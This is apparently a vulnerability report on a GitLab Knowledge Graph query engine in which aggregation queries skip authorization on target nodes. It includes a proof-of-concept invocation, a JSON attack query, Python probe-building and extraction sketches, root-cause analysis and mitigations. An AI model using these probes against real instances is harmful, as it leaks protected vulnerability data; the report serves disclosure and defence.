Aggregation queries bypass per-entity authorization for target nodes
## Summary
Aggregation queries in the Knowledge Graph query engine do not enforce
per-entity authorization (redaction) on the target node — only on the
`group_by` node. This allows a user with `read_project` but without
`read_vulnerability` to extract full vulnerability details (count, IDs,
severity, state, report type, title, timestamps) for any project within
their namespace scope.
## Reproduction
Attached: [aggregation_inference.py](/uploads/73ebfca273daaf483549a146b09f208b/aggregation_inference.py)
```bash
python3 aggregation_inference.py \
--gitlab-url http://gdk.test:8080 \
--token <PAT_WITH_REPORTER_ROLE_ONLY> \
--project-id <PROJECT_ID>
```
The script extracts vulnerability details using only aggregation queries.
No `read_vulnerability` ability is required or checked.
Example output:
```
[*] Phase 1: Counting vulnerabilities via aggregation...
Vulnerabilities found: 1
[*] Phase 2: Extracting severity distribution...
critical: 1
[*] Phase 5: Extracting individual vulnerability IDs...
Found 1 vulnerability IDs: [399]
[*] Phase 6: Extracting details for 1 vulnerabilities...
--- Vulnerability ID: 399 ---
severity: critical
state: detected
report_type: generic
title: 'test vuln'
created_at: 2026-03-24
```
## Root Cause
### 1. Compiler only adds redaction columns for `group_by` nodes
In `crates/query-engine/compiler/src/enforce.rs` (lines 133-143), the
`selectable_nodes` set for aggregation queries is built exclusively from
`group_by` aliases:
```rust
let selectable_nodes: HashSet<&str> = match input.query_type {
QueryType::Aggregation => input
.aggregations
.iter()
.filter_map(|agg| agg.group_by.as_deref())
.collect(),
// ...
};
```
Later (lines 193-198), nodes not in `selectable_nodes` are skipped — no
`_gkg_{alias}_id` or `_gkg_{alias}_type` columns are added for the target
node. This is explicitly tested at line 554 (`aggregation_only_adds_columns_for_group_by_nodes`).
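The gap can be illustrated with a toy model of the set computation. This is a Python sketch for illustration only, not the Rust compiler code; the `Aggregation` dataclass and both function names are hypothetical. The first function mirrors the `group_by`-only behavior quoted above, and the second shows one possible alternative that also treats aggregation targets as subject to redaction.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Aggregation:
    # Hypothetical stand-in for one entry of the query's "aggregations" list.
    function: str
    target: str
    alias: str
    group_by: Optional[str] = None


def selectable_group_by_only(aggs):
    """Mirror the reported behavior: only group_by aliases are selectable."""
    return {a.group_by for a in aggs if a.group_by is not None}


def selectable_with_targets(aggs):
    """Hypothetical alternative: also include each aggregation's target alias."""
    return selectable_group_by_only(aggs) | {a.target for a in aggs}


aggs = [Aggregation("count", target="v", alias="c", group_by="p")]
current = selectable_group_by_only(aggs)   # the target alias "v" is missing
proposed = selectable_with_targets(aggs)   # both "p" and "v" are covered
```

In this model the Vulnerability alias `v` never enters the current set, which is why no redaction columns are emitted for it.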
### 2. `resource_checks()` never collects target node IDs
In `crates/query-engine/types/src/query_result.rs` (line 263),
`resource_checks()` iterates over `self.ctx.nodes()`. Since the target
node was never added to the `ResultContext`, its IDs are never collected
for the Rails authorization exchange.
### 3. Authorization stage skips unchecked entity types
In the authorization stage, when `resource_checks()` returns no checks for
the Vulnerability type, no `read_vulnerability` call is made to Rails. The
rows pass through with only the `group_by` node (Project) being authorized.
### 4. Target node filters ARE applied in SQL
Meanwhile, the target node's filters from the query JSON are applied in the
SQL `WHERE` clause via `build_full_where()` in `lower.rs`. This creates a
1-bit oracle: the attacker can test any filter condition on any target node
column and observe whether the resulting count is zero or non-zero.
## Attack Technique
The attacker uses aggregation queries with `group_by` on a node they CAN
access (Project) and `count` on a node they CANNOT access (Vulnerability):
```json
{
"query_type": "aggregation",
"nodes": [
{"id": "p", "entity": "Project", "node_ids": [40]},
{"id": "v", "entity": "Vulnerability", "filters": {"severity": "critical"}}
],
"relationships": [{"type": "IN_PROJECT", "from": "v", "to": "p"}],
"aggregations": [{"function": "count", "target": "v", "alias": "c", "group_by": "p"}]
}
```
The Project node is authorized (redaction checked), but the Vulnerability
node is not. The filter `{"severity": "critical"}` is applied in the SQL
`WHERE` clause, and the resulting count (zero or non-zero) leaks whether any
vulnerability matched the condition.
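A minimal sketch of how such probes could be generated programmatically. The helper name `build_probe` is hypothetical, and the candidate severity list is an assumption based on GitLab's standard severity levels. The sketch only builds the JSON payloads shown above; how they are submitted is left to the attached script.

```python
import json

# Assumed candidate values; adjust to whatever the target schema accepts.
SEVERITIES = ["info", "unknown", "low", "medium", "high", "critical"]


def build_probe(project_id, vuln_filters):
    """Build one aggregation query: count Vulnerability rows grouped by Project."""
    return {
        "query_type": "aggregation",
        "nodes": [
            {"id": "p", "entity": "Project", "node_ids": [project_id]},
            {"id": "v", "entity": "Vulnerability", "filters": dict(vuln_filters)},
        ],
        "relationships": [{"type": "IN_PROJECT", "from": "v", "to": "p"}],
        "aggregations": [
            {"function": "count", "target": "v", "alias": "c", "group_by": "p"}
        ],
    }


# One probe per candidate value; each response count reveals one bit.
probes = {s: build_probe(40, {"severity": s}) for s in SEVERITIES}
payload = json.dumps(probes["critical"])
```

Each probe differs only in the filter on the unauthorized node, so the cost of enumerating an enum field is one query per candidate value.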
By iterating through possible values, the attacker extracts:
| Field | Technique | Queries |
|-------|-----------|---------|
| Count | Single query | 1 |
| IDs | Binary search on `id` with `lte`/`lt` | O(N log max_id) |
| Enum fields (severity, state, report_type) | Test each value | O(values) |
| Boolean fields | Test true/false | 2 |
| String fields (title) | Character-by-character with `starts_with` | O(len * charset) |
| Timestamps | Binary search on year/month/day with `gte`/`lte` | O(log range) |
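The ID and string rows of the table can be sketched against a simulated oracle. Everything here is an assumption made for illustration: `HIDDEN` stands in for rows the attacker cannot read, and `count_where` stands in for one aggregation query whose only observable result is a count. The real filter syntax for range and prefix operators is not shown in this report, so the predicates are plain Python lambdas.

```python
import string

# In-memory stand-in for the protected rows; a real attacker never sees this.
HIDDEN = [{"id": 399, "title": "test vuln"}]


def count_where(pred):
    """Simulated oracle: return only how many hidden rows match the predicate."""
    return sum(1 for row in HIDDEN if pred(row))


def find_ids(lo, hi):
    """Split [lo, hi] recursively, descending only into ranges with matches."""
    if count_where(lambda r: lo <= r["id"] <= hi) == 0:
        return []
    if lo == hi:
        return [lo]
    mid = (lo + hi) // 2
    return find_ids(lo, mid) + find_ids(mid + 1, hi)


def extract_title(row_id, charset, max_len=64):
    """Recover a title one character at a time using prefix tests."""
    prefix = ""
    for _ in range(max_len):
        for ch in charset:
            cand = prefix + ch
            if count_where(lambda r: r["id"] == row_id and r["title"].startswith(cand)):
                prefix = cand
                break
        else:
            break  # no character extends the prefix, so the title is complete
    return prefix


ids = find_ids(1, 1024)
title = extract_title(399, string.ascii_lowercase + " ")
```

The range split only descends into halves with a non-zero count, which is what keeps ID discovery near the O(N log max_id) bound listed in the table.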
## Affected Entity Pairs
Any entity pair where the `group_by` node has a lower privilege requirement
than the `count` target:
- `read_project` without `read_vulnerability` → leak vulnerability details
- `read_project` without `read_security_resource` → leak security findings
- `read_merge_request` without `read_code` → leak file paths, definitions
- `read_project` without `read_build` → leak CI pipeline/job details
## Mitigation Options
1. **Add redaction for target nodes in aggregation queries.** The compiler
should add `_gkg_{alias}_id` and `_gkg_{alias}_type` for target nodes,
and `resource_checks()` should collect their IDs. Rows where the user
lacks the target entity's ability should return count 0.
2. **Validate abilities at query time.** Before compiling, check that the
requesting user has the required ability for ALL entity types in the
query, not just the `group_by` entities.
3. **Restrict filters on unauthorized entities.** If the user doesn't have
the target entity's ability, reject queries with filters on that entity's
columns (prevents the oracle).
4. **Rate-limit aggregation queries.** As a defense-in-depth measure, limit
the number of aggregation queries per user per time window to make the
binary search extraction impractical.
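Option 2 could look roughly like the following pre-compilation check. This is a sketch under stated assumptions, not the engine's API: the `REQUIRED_ABILITY` mapping, the `MissingAbility` exception, and `check_query_abilities` are all hypothetical names, and abilities are modeled as a flat set even though real GitLab abilities are evaluated per resource.

```python
# Hypothetical entity -> ability mapping; only these two pairs come from this report.
REQUIRED_ABILITY = {
    "Project": "read_project",
    "Vulnerability": "read_vulnerability",
}


class MissingAbility(Exception):
    """Raised when a query touches an entity type the user may not read."""


def check_query_abilities(query, user_abilities):
    """Reject the query unless every node's entity type is readable."""
    for node in query["nodes"]:
        entity = node["entity"]
        required = REQUIRED_ABILITY.get(entity)
        # Fail closed: an unmapped entity type is treated as unauthorized.
        if required is None or required not in user_abilities:
            raise MissingAbility(f"{entity}: missing {required or 'unknown ability'}")


def is_allowed(query, user_abilities):
    """Convenience wrapper returning a boolean instead of raising."""
    try:
        check_query_abilities(query, user_abilities)
        return True
    except MissingAbility:
        return False


query = {
    "query_type": "aggregation",
    "nodes": [
        {"id": "p", "entity": "Project", "node_ids": [40]},
        {"id": "v", "entity": "Vulnerability", "filters": {"severity": "critical"}},
    ],
}
reporter_ok = is_allowed(query, {"read_project"})
full_ok = is_allowed(query, {"read_project", "read_vulnerability"})
```

Because the check covers every node rather than only the `group_by` node, the filter on the Vulnerability node is never evaluated for a user who lacks `read_vulnerability`, which removes the oracle instead of merely slowing it down.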
## Attachments
[aggregation_inference.py](/uploads/73ebfca273daaf483549a146b09f208b/aggregation_inference.py): proof-of-concept script